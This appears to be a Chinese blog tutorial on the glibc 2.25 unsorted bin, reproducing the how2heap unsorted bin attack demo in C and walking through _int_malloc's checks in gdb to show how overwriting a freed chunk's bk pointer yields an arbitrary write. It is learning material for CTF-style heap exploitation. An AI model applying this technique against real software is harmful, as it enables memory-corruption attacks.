通过 glibc2.25 学习 unsorted bin

前言：那再进步一点点。。。

0X00 通过 how2heap 学习原理

#include <stdio.h>
#include <stdlib.h>

int main(){
    fprintf(stderr, "This file demonstrates unsorted bin attack by write a large unsigned long value into stack\n");
    fprintf(stderr, "In practice, unsorted bin attack is generally prepared for further attacks, such as rewriting the "
           "global variable global_max_fast in libc for further fastbin attack\n\n");

    unsigned long stack_var=0;
    fprintf(stderr, "Let's first look at the target we want to rewrite on stack:\n");
    fprintf(stderr, "%p: %ld\n\n", &stack_var, stack_var);

    unsigned long *p=malloc(400);
    fprintf(stderr, "Now, we allocate first normal chunk on the heap at: %p\n",p);
    fprintf(stderr, "And allocate another normal chunk in order to avoid consolidating the top chunk with"
           "the first one during the free()\n\n");
    malloc(500);

    free(p);
    fprintf(stderr, "We free the first chunk now and it will be inserted in the unsorted bin with its bk pointer "
           "point to %p\n",(void*)p[1]);

    //------------VULNERABILITY-----------

    p[1]=(unsigned long)(&stack_var-2);
    fprintf(stderr, "Now emulating a vulnerability that can overwrite the victim->bk pointer\n");
    fprintf(stderr, "And we write it with the target address-16 (in 32-bits machine, it should be target address-8):%p\n\n",(void*)p[1]);

    //------------------------------------

    malloc(400);
    fprintf(stderr, "Let's malloc again to get the chunk we just free. During this time, the target should have already been "
           "rewritten:\n");
    fprintf(stderr, "%p: %p\n", &stack_var, (void*)stack_var);
}

用一张图解释一下发生了什么，图片来自 CTF WIKI

简单来说通过伪造最后一个 chunk 的 bk，来达到改写的目的。

以下内容摘自 CTF WIKI：

unsorted bin 中的 chunk 有两种基本来源：

当分割一块比较大的 chunk 的时候，（特殊的 chunk 除外）如果剩下的 chunk 大于 MINISIZE（64 位是 32 Byte），就会放在 unsorted bin 中
释放一个不属于 fastbin 的 chunk，如果不和 top chunk 紧邻，就会放在 unsorted bin 中

unsorted bin 中的 chunk 有两种基本去处：

空闲的 chunk 从头部进，从链表尾部拿出 chunk
还可以把 unsorted bin 看成 small bin 和 large bin 的缓存，在寻找 chunk 的时候，如果 fastbin 里面没有合适的 chunk，就会去 unsorted bin 里面去寻找 chunk，如果 unsorted bin 里面没有，就会把 unsorted bin 里面的 chunk，放回到 small bin large bin 中

0X01 通过调试学习防护机制

通过 glibc 2.25 我们来学习一下 unsorted bin 的创建需要哪些检查，建议跟着一起调试：

pwngdb 走起：

// gcc unsorted.c -o unsorted -g
// patchelf --set-interpreter /home/tenshine/all_glibc/glibc-2.25/64/lib/ld-2.25.so unsorted
// gdb unsorted 
#include <stdio.h>
#include <stdlib.h>

int main() {
    
    void* p = malloc(0x80);
    malloc(0x20);
    void* p1 = malloc(0x100);
    malloc(0x20);

    free(p);
    free(p1);

    malloc(0x100);
    return 0;
}

这里我们暂时只分析相同大小的 unsorted bin 分配，等我学完了大部分的攻击，我们再继续深入。

我们直接进入最后一个 malloc

来看看，现在 unsorted bin 的情况：

现在有两个 unsorted bin chunk，箭头的意思是 fd。unsorted bin 是一个循环双向链表。它的头地址在 main_arena+88 的位置，这个位置的 bk 指向最后一个 chunk。

我们继续进入 __libc_malloc 再进入 _int_malloc：

顺着走下来，我们走到一个循环：

在这个循环中，我们开始从最后一个 unsorted bin 开始选择合适的 chunk

while ((victim = unsorted_chunks (av)->bk) != unsorted_chunks (av))

这个循环中，victim 被赋值最后一个 chunk 的地址

我们迎来了第一个检查：

大致意思是，这最后一个 chunk 的 size 不能比 2 × SIZE_SZ 要小，也不能比该分配区分配的内存要大。

好我们继续

这个 if 在我们这个情况下可以不用看，跳过。上面的注释写得很清楚。

注意看这里，glibc 直接把 victim 从链表中拿出来了。但是！并不知道是不是满足分配的大小，而我们知道，这个 chunk 的 size 是不满足的。

我们看看现在的 unsorted chunk：

那么这个 chunk 放到哪里了呢？放到了 small bin 或者 large bin 中了。并把那个 bin 标记有空闲的 chunk

到第二次循环，我们直接进入：

然后就可以把它分配出来了。

0X02 总结

总结一下：

在 glibc2.25 中如果能够控制最后一个 chunk 的 bk，在 0X00 中我们正是修改了最后一个 chunk 的 bk，导致 bck 指向的不是 main_arena+88，而是其他位置（被计算好的），通过修改 bck->fd 来修改想改的值。

unsorted_chunks (av)->bk = bck;
bck->fd = unsorted_chunks (av);

完结撒花。。。

人面猴
序言：七十年代末，一起剥皮案震惊了整个滨河市，随后出现的几起案子，更是在滨河造成了极大的恐慌，老刑警刘岩，带你破解...
沈念sama阅读 160,706评论 4赞 366
死咒
序言：滨河连续发生了三起死亡事件，死亡现场离奇诡异，居然都是意外死亡，警方通过查阅死者的电脑和手机，发现死者居然都...
沈念sama阅读 68,002评论 1赞 301
救了他两次的神仙让他今天三更去死
文/潘晓璐我一进店门，熙熙楼的掌柜王于贵愁眉苦脸地迎上来，“玉大人，你说我怎么就摊上这事。” “怎么了？”我有些...
开封第一讲书人阅读 110,462评论 0赞 250
道士缉凶录：失踪的卖姜人
文/不坏的土叔我叫张陵，是天一观的道长。经常有香客问我，道长，这世上最难降的妖魔是什么？我笑而不...
开封第一讲书人阅读 44,375评论 0赞 216
港岛之恋（遗憾婚礼）
正文为了忘掉前任，我火速办了婚礼，结果婚礼上，老公的妹妹穿的比我还像新娘。我一直安慰自己，他们只是感情好，可当我...
茶点故事阅读 52,763评论 3赞 294
恶毒庶女顶嫁案：这布局不是一般人想出来的
文/花漫我一把揭开白布。她就那样静静地躺着，像睡着了一般。火红的嫁衣衬着肌肤如雪。梳的纹丝不乱的头发上，一...
开封第一讲书人阅读 40,849评论 1赞 224
城市分裂传说
那天，我揣着相机与录音，去河边找鬼。笑死，一个胖子当着我的面吹牛，可吹牛的内容都是我干的。我是一名探鬼主播，决...
沈念sama阅读 32,033评论 2赞 317
双鸳鸯连环套：你想象不到人心有多黑
文/苍兰香墨我猛地睁开眼，长吁一口气：“原来是场噩梦啊……” “哼！你这毒妇竟也来了？” 一声冷哼从身侧响起，我...
开封第一讲书人阅读 30,768评论 0赞 204
万荣杀人案实录
序言：老挝万荣一对情侣失踪，失踪者是张志新（化名）和其女友刘颖，没想到半个月后，有当地人在树林里发现了一具尸体，经...
沈念sama阅读 34,490评论 1赞 246
护林员之死
正文独居荒郊野岭守林人离奇死亡，尸身上长有42处带血的脓包…… 初始之章·张勋以下内容为张勋视角年9月15日...
茶点故事阅读 30,734评论 2赞 253
白月光启示录
正文我和宋清朗相恋三年，在试婚纱的时候发现自己被绿了。大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
茶点故事阅读 32,204评论 1赞 264
活死人
序言：一个原本活蹦乱跳的男人离奇死亡，死状恐怖，灵堂内的尸体忽然破棺而出，到底是诈尸还是另有隐情，我是刑警宁泽，带...
沈念sama阅读 28,566评论 3赞 260
日本核电站爆炸内幕
正文年R本政府宣布，位于F岛的核电站，受9级特大地震影响，放射性物质发生泄漏。R本人自食恶果不足惜，却给世界环境...
茶点故事阅读 33,227评论 3赞 241
男人毒药：我在死后第九天来索命
文/蒙蒙一、第九天我趴在偏房一处隐蔽的房顶上张望。院中可真热闹，春花似锦、人声如沸。这庄子的主人今日做“春日...
开封第一讲书人阅读 26,137评论 0赞 8
一桩弑父案，背后竟有这般阴谋
文/苍兰香墨我抬头看了看天上的太阳。三九已至，却和暖如春，着一层夹袄步出监牢的瞬间，已是汗流浃背。一阵脚步声响...
开封第一讲书人阅读 26,934评论 0赞 201
情欲美人皮
我被黑心中介骗来泰国打工，没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留，地道东北人。一个月前我还...
沈念sama阅读 35,926评论 2赞 283
代替公主和亲
正文我出身青楼，却偏偏与公主长得像，于是被迫代替她去往敌国和亲。传闻我的和亲对象是个残疾皇子，可洞房花烛夜当晚...
茶点故事阅读 35,774评论 2赞 274

通过 glibc2.25 学习 unsorted bin

0X00 通过 how2heap 学习原理

0X01 通过调试学习防护机制

0X02 总结

推荐阅读更多精彩内容